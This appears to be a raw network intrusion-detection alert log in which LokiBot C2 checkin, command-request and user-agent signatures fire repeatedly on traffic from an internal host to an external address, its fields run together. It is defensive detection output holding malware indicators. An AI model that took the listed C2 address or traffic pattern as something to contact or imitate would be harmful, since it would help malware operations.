                12/03/20-10:00:05.666385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006380192.168.2.545.134.225.18
                12/03/20-10:00:05.666385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006380192.168.2.545.134.225.18
                12/03/20-10:00:05.666385TCP2025381ET TROJAN LokiBot Checkin5006380192.168.2.545.134.225.18
                12/03/20-10:00:05.666385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006380192.168.2.545.134.225.18
                12/03/20-10:00:05.960106TCP2570WEB-MISC Invalid HTTP Version String5006480192.168.2.545.134.225.18
                12/03/20-10:00:05.960106TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006480192.168.2.545.134.225.18
                12/03/20-10:00:05.960106TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006480192.168.2.545.134.225.18
                12/03/20-10:00:05.960106TCP2025381ET TROJAN LokiBot Checkin5006480192.168.2.545.134.225.18
                12/03/20-10:00:05.960106TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006480192.168.2.545.134.225.18
                12/03/20-10:00:06.254094TCP2570WEB-MISC Invalid HTTP Version String5006580192.168.2.545.134.225.18
                12/03/20-10:00:06.254094TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006580192.168.2.545.134.225.18
                12/03/20-10:00:06.254094TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006580192.168.2.545.134.225.18
                12/03/20-10:00:06.254094TCP2025381ET TROJAN LokiBot Checkin5006580192.168.2.545.134.225.18
                12/03/20-10:00:06.254094TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006580192.168.2.545.134.225.18
                12/03/20-10:00:06.534481TCP2570WEB-MISC Invalid HTTP Version String5006680192.168.2.545.134.225.18
                12/03/20-10:00:06.534481TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006680192.168.2.545.134.225.18
                12/03/20-10:00:06.534481TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006680192.168.2.545.134.225.18
                12/03/20-10:00:06.534481TCP2025381ET TROJAN LokiBot Checkin5006680192.168.2.545.134.225.18
                12/03/20-10:00:06.534481TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006680192.168.2.545.134.225.18
                12/03/20-10:00:06.822661TCP2570WEB-MISC Invalid HTTP Version String5006780192.168.2.545.134.225.18
                12/03/20-10:00:06.822661TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006780192.168.2.545.134.225.18
                12/03/20-10:00:06.822661TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006780192.168.2.545.134.225.18
                12/03/20-10:00:06.822661TCP2025381ET TROJAN LokiBot Checkin5006780192.168.2.545.134.225.18
                12/03/20-10:00:06.822661TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006780192.168.2.545.134.225.18
                12/03/20-10:00:07.117669TCP2570WEB-MISC Invalid HTTP Version String5006880192.168.2.545.134.225.18
                12/03/20-10:00:07.117669TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006880192.168.2.545.134.225.18
                12/03/20-10:00:07.117669TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006880192.168.2.545.134.225.18
                12/03/20-10:00:07.117669TCP2025381ET TROJAN LokiBot Checkin5006880192.168.2.545.134.225.18
                12/03/20-10:00:07.117669TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006880192.168.2.545.134.225.18
                12/03/20-10:00:07.392867TCP2570WEB-MISC Invalid HTTP Version String5006980192.168.2.545.134.225.18
                12/03/20-10:00:07.392867TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006980192.168.2.545.134.225.18
                12/03/20-10:00:07.392867TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006980192.168.2.545.134.225.18
                12/03/20-10:00:07.392867TCP2025381ET TROJAN LokiBot Checkin5006980192.168.2.545.134.225.18
                12/03/20-10:00:07.392867TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006980192.168.2.545.134.225.18
                12/03/20-10:00:07.672555TCP2570WEB-MISC Invalid HTTP Version String5007080192.168.2.545.134.225.18
                12/03/20-10:00:07.672555TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007080192.168.2.545.134.225.18
                12/03/20-10:00:07.672555TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007080192.168.2.545.134.225.18
                12/03/20-10:00:07.672555TCP2025381ET TROJAN LokiBot Checkin5007080192.168.2.545.134.225.18
                12/03/20-10:00:07.672555TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007080192.168.2.545.134.225.18
                12/03/20-10:00:07.941833TCP2570WEB-MISC Invalid HTTP Version String5007180192.168.2.545.134.225.18
                12/03/20-10:00:07.941833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007180192.168.2.545.134.225.18
                12/03/20-10:00:07.941833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007180192.168.2.545.134.225.18
                12/03/20-10:00:07.941833TCP2025381ET TROJAN LokiBot Checkin5007180192.168.2.545.134.225.18
                12/03/20-10:00:07.941833TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007180192.168.2.545.134.225.18
                12/03/20-10:00:08.207892TCP2570WEB-MISC Invalid HTTP Version String5007280192.168.2.545.134.225.18
                12/03/20-10:00:08.207892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007280192.168.2.545.134.225.18
                12/03/20-10:00:08.207892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007280192.168.2.545.134.225.18
                12/03/20-10:00:08.207892TCP2025381ET TROJAN LokiBot Checkin5007280192.168.2.545.134.225.18
                12/03/20-10:00:08.207892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007280192.168.2.545.134.225.18
                12/03/20-10:00:08.477285TCP2570WEB-MISC Invalid HTTP Version String5007380192.168.2.545.134.225.18
                12/03/20-10:00:08.477285TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007380192.168.2.545.134.225.18
                12/03/20-10:00:08.477285TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007380192.168.2.545.134.225.18
                12/03/20-10:00:08.477285TCP2025381ET TROJAN LokiBot Checkin5007380192.168.2.545.134.225.18
                12/03/20-10:00:08.477285TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007380192.168.2.545.134.225.18
                12/03/20-10:00:08.777447TCP2570WEB-MISC Invalid HTTP Version String5007480192.168.2.545.134.225.18
                12/03/20-10:00:08.777447TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007480192.168.2.545.134.225.18
                12/03/20-10:00:08.777447TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007480192.168.2.545.134.225.18
                12/03/20-10:00:08.777447TCP2025381ET TROJAN LokiBot Checkin5007480192.168.2.545.134.225.18
                12/03/20-10:00:08.777447TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007480192.168.2.545.134.225.18
                12/03/20-10:00:09.061100TCP2570WEB-MISC Invalid HTTP Version String5007580192.168.2.545.134.225.18
                12/03/20-10:00:09.061100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007580192.168.2.545.134.225.18
                12/03/20-10:00:09.061100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007580192.168.2.545.134.225.18
                12/03/20-10:00:09.061100TCP2025381ET TROJAN LokiBot Checkin5007580192.168.2.545.134.225.18
                12/03/20-10:00:09.061100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007580192.168.2.545.134.225.18
                12/03/20-10:00:09.357664TCP2570WEB-MISC Invalid HTTP Version String5007680192.168.2.545.134.225.18
                12/03/20-10:00:09.357664TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007680192.168.2.545.134.225.18
                12/03/20-10:00:09.357664TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007680192.168.2.545.134.225.18
                12/03/20-10:00:09.357664TCP2025381ET TROJAN LokiBot Checkin5007680192.168.2.545.134.225.18
                12/03/20-10:00:09.357664TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007680192.168.2.545.134.225.18
                12/03/20-10:00:09.632157TCP2570WEB-MISC Invalid HTTP Version String5007780192.168.2.545.134.225.18
                12/03/20-10:00:09.632157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007780192.168.2.545.134.225.18
                12/03/20-10:00:09.632157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007780192.168.2.545.134.225.18
                12/03/20-10:00:09.632157TCP2025381ET TROJAN LokiBot Checkin5007780192.168.2.545.134.225.18
                12/03/20-10:00:09.632157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007780192.168.2.545.134.225.18
                12/03/20-10:00:09.925052TCP2570WEB-MISC Invalid HTTP Version String5007880192.168.2.545.134.225.18
                12/03/20-10:00:09.925052TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007880192.168.2.545.134.225.18
                12/03/20-10:00:09.925052TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007880192.168.2.545.134.225.18
                12/03/20-10:00:09.925052TCP2025381ET TROJAN LokiBot Checkin5007880192.168.2.545.134.225.18
                12/03/20-10:00:09.925052TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007880192.168.2.545.134.225.18
                12/03/20-10:00:10.197201TCP2570WEB-MISC Invalid HTTP Version String5007980192.168.2.545.134.225.18
                12/03/20-10:00:10.197201TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007980192.168.2.545.134.225.18
                12/03/20-10:00:10.197201TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007980192.168.2.545.134.225.18
                12/03/20-10:00:10.197201TCP2025381ET TROJAN LokiBot Checkin5007980192.168.2.545.134.225.18
                12/03/20-10:00:10.197201TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007980192.168.2.545.134.225.18
                12/03/20-10:00:10.472702TCP2570WEB-MISC Invalid HTTP Version String5008080192.168.2.545.134.225.18
                12/03/20-10:00:10.472702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008080192.168.2.545.134.225.18
                12/03/20-10:00:10.472702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008080192.168.2.545.134.225.18
                12/03/20-10:00:10.472702TCP2025381ET TROJAN LokiBot Checkin5008080192.168.2.545.134.225.18
                12/03/20-10:00:10.472702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008080192.168.2.545.134.225.18
                12/03/20-10:00:10.746786TCP2570WEB-MISC Invalid HTTP Version String5008180192.168.2.545.134.225.18
                12/03/20-10:00:10.746786TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008180192.168.2.545.134.225.18
                12/03/20-10:00:10.746786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008180192.168.2.545.134.225.18
                12/03/20-10:00:10.746786TCP2025381ET TROJAN LokiBot Checkin5008180192.168.2.545.134.225.18
                12/03/20-10:00:10.746786TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008180192.168.2.545.134.225.18
                12/03/20-10:00:11.022688TCP2570WEB-MISC Invalid HTTP Version String5008280192.168.2.545.134.225.18
                12/03/20-10:00:11.022688TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008280192.168.2.545.134.225.18
                12/03/20-10:00:11.022688TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008280192.168.2.545.134.225.18
                12/03/20-10:00:11.022688TCP2025381ET TROJAN LokiBot Checkin5008280192.168.2.545.134.225.18
                12/03/20-10:00:11.022688TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008280192.168.2.545.134.225.18
                12/03/20-10:00:11.300480TCP2570WEB-MISC Invalid HTTP Version String5008380192.168.2.545.134.225.18
                12/03/20-10:00:11.300480TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008380192.168.2.545.134.225.18
                12/03/20-10:00:11.300480TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008380192.168.2.545.134.225.18
                12/03/20-10:00:11.300480TCP2025381ET TROJAN LokiBot Checkin5008380192.168.2.545.134.225.18
                12/03/20-10:00:11.300480TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008380192.168.2.545.134.225.18
                12/03/20-10:00:11.578885TCP2570WEB-MISC Invalid HTTP Version String5008480192.168.2.545.134.225.18
                12/03/20-10:00:11.578885TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008480192.168.2.545.134.225.18
                12/03/20-10:00:11.578885TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008480192.168.2.545.134.225.18
                12/03/20-10:00:11.578885TCP2025381ET TROJAN LokiBot Checkin5008480192.168.2.545.134.225.18
                12/03/20-10:00:11.578885TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008480192.168.2.545.134.225.18
                12/03/20-10:00:11.861839TCP2570WEB-MISC Invalid HTTP Version String5008580192.168.2.545.134.225.18
                12/03/20-10:00:11.861839TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008580192.168.2.545.134.225.18
                12/03/20-10:00:11.861839TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008580192.168.2.545.134.225.18
                12/03/20-10:00:11.861839TCP2025381ET TROJAN LokiBot Checkin5008580192.168.2.545.134.225.18
                12/03/20-10:00:11.861839TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008580192.168.2.545.134.225.18
                12/03/20-10:00:12.144350TCP2570WEB-MISC Invalid HTTP Version String5008680192.168.2.545.134.225.18
                12/03/20-10:00:12.144350TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008680192.168.2.545.134.225.18
                12/03/20-10:00:12.144350TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008680192.168.2.545.134.225.18
                12/03/20-10:00:12.144350TCP2025381ET TROJAN LokiBot Checkin5008680192.168.2.545.134.225.18
                12/03/20-10:00:12.144350TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008680192.168.2.545.134.225.18
                12/03/20-10:00:12.420151TCP2570WEB-MISC Invalid HTTP Version String5008780192.168.2.545.134.225.18
                12/03/20-10:00:12.420151TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008780192.168.2.545.134.225.18
                12/03/20-10:00:12.420151TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008780192.168.2.545.134.225.18
                12/03/20-10:00:12.420151TCP2025381ET TROJAN LokiBot Checkin5008780192.168.2.545.134.225.18
                12/03/20-10:00:12.420151TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008780192.168.2.545.134.225.18
                12/03/20-10:00:12.705294TCP2570WEB-MISC Invalid HTTP Version String5008880192.168.2.545.134.225.18
                12/03/20-10:00:12.705294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008880192.168.2.545.134.225.18
                12/03/20-10:00:12.705294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008880192.168.2.545.134.225.18
                12/03/20-10:00:12.705294TCP2025381ET TROJAN LokiBot Checkin5008880192.168.2.545.134.225.18
                12/03/20-10:00:12.705294TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008880192.168.2.545.134.225.18
                12/03/20-10:00:12.990587TCP2570WEB-MISC Invalid HTTP Version String5008980192.168.2.545.134.225.18
                12/03/20-10:00:12.990587TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008980192.168.2.545.134.225.18
                12/03/20-10:00:12.990587TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008980192.168.2.545.134.225.18
                12/03/20-10:00:12.990587TCP2025381ET TROJAN LokiBot Checkin5008980192.168.2.545.134.225.18
                12/03/20-10:00:12.990587TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008980192.168.2.545.134.225.18
                12/03/20-10:00:13.317086TCP2570WEB-MISC Invalid HTTP Version String5009080192.168.2.545.134.225.18
                12/03/20-10:00:13.317086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009080192.168.2.545.134.225.18
                12/03/20-10:00:13.317086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009080192.168.2.545.134.225.18
                12/03/20-10:00:13.317086TCP2025381ET TROJAN LokiBot Checkin5009080192.168.2.545.134.225.18
                12/03/20-10:00:13.317086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009080192.168.2.545.134.225.18
                12/03/20-10:00:13.592506TCP2570WEB-MISC Invalid HTTP Version String5009180192.168.2.545.134.225.18
                12/03/20-10:00:13.592506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009180192.168.2.545.134.225.18
                12/03/20-10:00:13.592506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009180192.168.2.545.134.225.18
                12/03/20-10:00:13.592506TCP2025381ET TROJAN LokiBot Checkin5009180192.168.2.545.134.225.18
                12/03/20-10:00:13.592506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009180192.168.2.545.134.225.18
                12/03/20-10:00:13.875672TCP2570WEB-MISC Invalid HTTP Version String5009280192.168.2.545.134.225.18
                12/03/20-10:00:13.875672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009280192.168.2.545.134.225.18
                12/03/20-10:00:13.875672TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009280192.168.2.545.134.225.18
                12/03/20-10:00:13.875672TCP2025381ET TROJAN LokiBot Checkin5009280192.168.2.545.134.225.18
                12/03/20-10:00:13.875672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009280192.168.2.545.134.225.18
                12/03/20-10:00:14.146310TCP2570WEB-MISC Invalid HTTP Version String5009380192.168.2.545.134.225.18
                12/03/20-10:00:14.146310TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009380192.168.2.545.134.225.18
                12/03/20-10:00:14.146310TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009380192.168.2.545.134.225.18
                12/03/20-10:00:14.146310TCP2025381ET TROJAN LokiBot Checkin5009380192.168.2.545.134.225.18
                12/03/20-10:00:14.146310TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009380192.168.2.545.134.225.18
                12/03/20-10:00:14.417278TCP2570WEB-MISC Invalid HTTP Version String5009480192.168.2.545.134.225.18
                12/03/20-10:00:14.417278TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009480192.168.2.545.134.225.18
                12/03/20-10:00:14.417278TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009480192.168.2.545.134.225.18
                12/03/20-10:00:14.417278TCP2025381ET TROJAN LokiBot Checkin5009480192.168.2.545.134.225.18
                12/03/20-10:00:14.417278TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009480192.168.2.545.134.225.18
                12/03/20-10:00:14.708707TCP2570WEB-MISC Invalid HTTP Version String5009580192.168.2.545.134.225.18
                12/03/20-10:00:14.708707TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009580192.168.2.545.134.225.18
                12/03/20-10:00:14.708707TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009580192.168.2.545.134.225.18
                12/03/20-10:00:14.708707TCP2025381ET TROJAN LokiBot Checkin5009580192.168.2.545.134.225.18
                12/03/20-10:00:14.708707TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009580192.168.2.545.134.225.18
                12/03/20-10:00:14.988760TCP2570WEB-MISC Invalid HTTP Version String5009680192.168.2.545.134.225.18
                12/03/20-10:00:14.988760TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009680192.168.2.545.134.225.18
                12/03/20-10:00:14.988760TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009680192.168.2.545.134.225.18
                12/03/20-10:00:14.988760TCP2025381ET TROJAN LokiBot Checkin5009680192.168.2.545.134.225.18
                12/03/20-10:00:14.988760TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009680192.168.2.545.134.225.18
                12/03/20-10:00:15.269272TCP2570WEB-MISC Invalid HTTP Version String5009780192.168.2.545.134.225.18
                12/03/20-10:00:15.269272TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009780192.168.2.545.134.225.18
                12/03/20-10:00:15.269272TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009780192.168.2.545.134.225.18
                12/03/20-10:00:15.269272TCP2025381ET TROJAN LokiBot Checkin5009780192.168.2.545.134.225.18
                12/03/20-10:00:15.269272TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009780192.168.2.545.134.225.18
                12/03/20-10:00:15.551915TCP2570WEB-MISC Invalid HTTP Version String5009880192.168.2.545.134.225.18
                12/03/20-10:00:15.551915TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009880192.168.2.545.134.225.18
                12/03/20-10:00:15.551915TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009880192.168.2.545.134.225.18
                12/03/20-10:00:15.551915TCP2025381ET TROJAN LokiBot Checkin5009880192.168.2.545.134.225.18
                12/03/20-10:00:15.551915TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009880192.168.2.545.134.225.18
                12/03/20-10:00:15.850888TCP2570WEB-MISC Invalid HTTP Version String5009980192.168.2.545.134.225.18
                12/03/20-10:00:15.850888TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009980192.168.2.545.134.225.18
                12/03/20-10:00:15.850888TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009980192.168.2.545.134.225.18
                12/03/20-10:00:15.850888TCP2025381ET TROJAN LokiBot Checkin5009980192.168.2.545.134.225.18
                12/03/20-10:00:15.850888TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009980192.168.2.545.134.225.18
                12/03/20-10:00:16.139749TCP2570WEB-MISC Invalid HTTP Version String5010080192.168.2.545.134.225.18
                12/03/20-10:00:16.139749TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010080192.168.2.545.134.225.18
                12/03/20-10:00:16.139749TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010080192.168.2.545.134.225.18
                12/03/20-10:00:16.139749TCP2025381ET TROJAN LokiBot Checkin5010080192.168.2.545.134.225.18
                12/03/20-10:00:16.139749TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010080192.168.2.545.134.225.18
                12/03/20-10:00:16.422374TCP2570WEB-MISC Invalid HTTP Version String5010180192.168.2.545.134.225.18
                12/03/20-10:00:16.422374TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010180192.168.2.545.134.225.18
                12/03/20-10:00:16.422374TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010180192.168.2.545.134.225.18
                12/03/20-10:00:16.422374TCP2025381ET TROJAN LokiBot Checkin5010180192.168.2.545.134.225.18
                12/03/20-10:00:16.422374TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010180192.168.2.545.134.225.18
                12/03/20-10:00:16.707982TCP2570WEB-MISC Invalid HTTP Version String5010280192.168.2.545.134.225.18
                12/03/20-10:00:16.707982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010280192.168.2.545.134.225.18
                12/03/20-10:00:16.707982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010280192.168.2.545.134.225.18
                12/03/20-10:00:16.707982TCP2025381ET TROJAN LokiBot Checkin5010280192.168.2.545.134.225.18
                12/03/20-10:00:16.707982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010280192.168.2.545.134.225.18
                12/03/20-10:00:16.981693TCP2570WEB-MISC Invalid HTTP Version String5010380192.168.2.545.134.225.18
                12/03/20-10:00:16.981693TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010380192.168.2.545.134.225.18
                12/03/20-10:00:16.981693TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010380192.168.2.545.134.225.18
                12/03/20-10:00:16.981693TCP2025381ET TROJAN LokiBot Checkin5010380192.168.2.545.134.225.18
                12/03/20-10:00:16.981693TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010380192.168.2.545.134.225.18
                12/03/20-10:00:17.247421TCP2570WEB-MISC Invalid HTTP Version String5010480192.168.2.545.134.225.18
                12/03/20-10:00:17.247421TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010480192.168.2.545.134.225.18
                12/03/20-10:00:17.247421TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010480192.168.2.545.134.225.18
                12/03/20-10:00:17.247421TCP2025381ET TROJAN LokiBot Checkin5010480192.168.2.545.134.225.18
                12/03/20-10:00:17.247421TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010480192.168.2.545.134.225.18
                12/03/20-10:00:17.536949TCP2570WEB-MISC Invalid HTTP Version String5010580192.168.2.545.134.225.18
                12/03/20-10:00:17.536949TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010580192.168.2.545.134.225.18
                12/03/20-10:00:17.536949TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010580192.168.2.545.134.225.18
                12/03/20-10:00:17.536949TCP2025381ET TROJAN LokiBot Checkin5010580192.168.2.545.134.225.18
                12/03/20-10:00:17.536949TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010580192.168.2.545.134.225.18
                12/03/20-10:00:17.815356TCP2570WEB-MISC Invalid HTTP Version String5010680192.168.2.545.134.225.18
                12/03/20-10:00:17.815356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010680192.168.2.545.134.225.18
                12/03/20-10:00:17.815356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010680192.168.2.545.134.225.18
                12/03/20-10:00:17.815356TCP2025381ET TROJAN LokiBot Checkin5010680192.168.2.545.134.225.18
                12/03/20-10:00:17.815356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010680192.168.2.545.134.225.18
                12/03/20-10:00:18.090130TCP2570WEB-MISC Invalid HTTP Version String5010780192.168.2.545.134.225.18
                12/03/20-10:00:18.090130TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010780192.168.2.545.134.225.18
                12/03/20-10:00:18.090130TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010780192.168.2.545.134.225.18
                12/03/20-10:00:18.090130TCP2025381ET TROJAN LokiBot Checkin5010780192.168.2.545.134.225.18
                12/03/20-10:00:18.090130TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010780192.168.2.545.134.225.18
                12/03/20-10:00:18.377232TCP2570WEB-MISC Invalid HTTP Version String5010880192.168.2.545.134.225.18
                12/03/20-10:00:18.377232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010880192.168.2.545.134.225.18
                12/03/20-10:00:18.377232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010880192.168.2.545.134.225.18
                12/03/20-10:00:18.377232TCP2025381ET TROJAN LokiBot Checkin5010880192.168.2.545.134.225.18
                12/03/20-10:00:18.377232TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010880192.168.2.545.134.225.18
                12/03/20-10:00:18.657194TCP2570WEB-MISC Invalid HTTP Version String5010980192.168.2.545.134.225.18
                12/03/20-10:00:18.657194TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010980192.168.2.545.134.225.18
                12/03/20-10:00:18.657194TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010980192.168.2.545.134.225.18
                12/03/20-10:00:18.657194TCP2025381ET TROJAN LokiBot Checkin5010980192.168.2.545.134.225.18
                12/03/20-10:00:18.657194TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010980192.168.2.545.134.225.18
                12/03/20-10:00:18.930373TCP2570WEB-MISC Invalid HTTP Version String5011080192.168.2.545.134.225.18
                12/03/20-10:00:18.930373TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011080192.168.2.545.134.225.18
                12/03/20-10:00:18.930373TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011080192.168.2.545.134.225.18
                12/03/20-10:00:18.930373TCP2025381ET TROJAN LokiBot Checkin5011080192.168.2.545.134.225.18
                12/03/20-10:00:18.930373TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011080192.168.2.545.134.225.18
                12/03/20-10:00:19.225657TCP2570WEB-MISC Invalid HTTP Version String5011180192.168.2.545.134.225.18
                12/03/20-10:00:19.225657TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011180192.168.2.545.134.225.18
                12/03/20-10:00:19.225657TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011180192.168.2.545.134.225.18
                12/03/20-10:00:19.225657TCP2025381ET TROJAN LokiBot Checkin5011180192.168.2.545.134.225.18
                12/03/20-10:00:19.225657TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011180192.168.2.545.134.225.18
                12/03/20-10:00:19.515623TCP2570WEB-MISC Invalid HTTP Version String5011280192.168.2.545.134.225.18
                12/03/20-10:00:19.515623TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011280192.168.2.545.134.225.18
                12/03/20-10:00:19.515623TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011280192.168.2.545.134.225.18
                12/03/20-10:00:19.515623TCP2025381ET TROJAN LokiBot Checkin5011280192.168.2.545.134.225.18
                12/03/20-10:00:19.515623TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011280192.168.2.545.134.225.18
                12/03/20-10:00:19.800045TCP2570WEB-MISC Invalid HTTP Version String5011380192.168.2.545.134.225.18
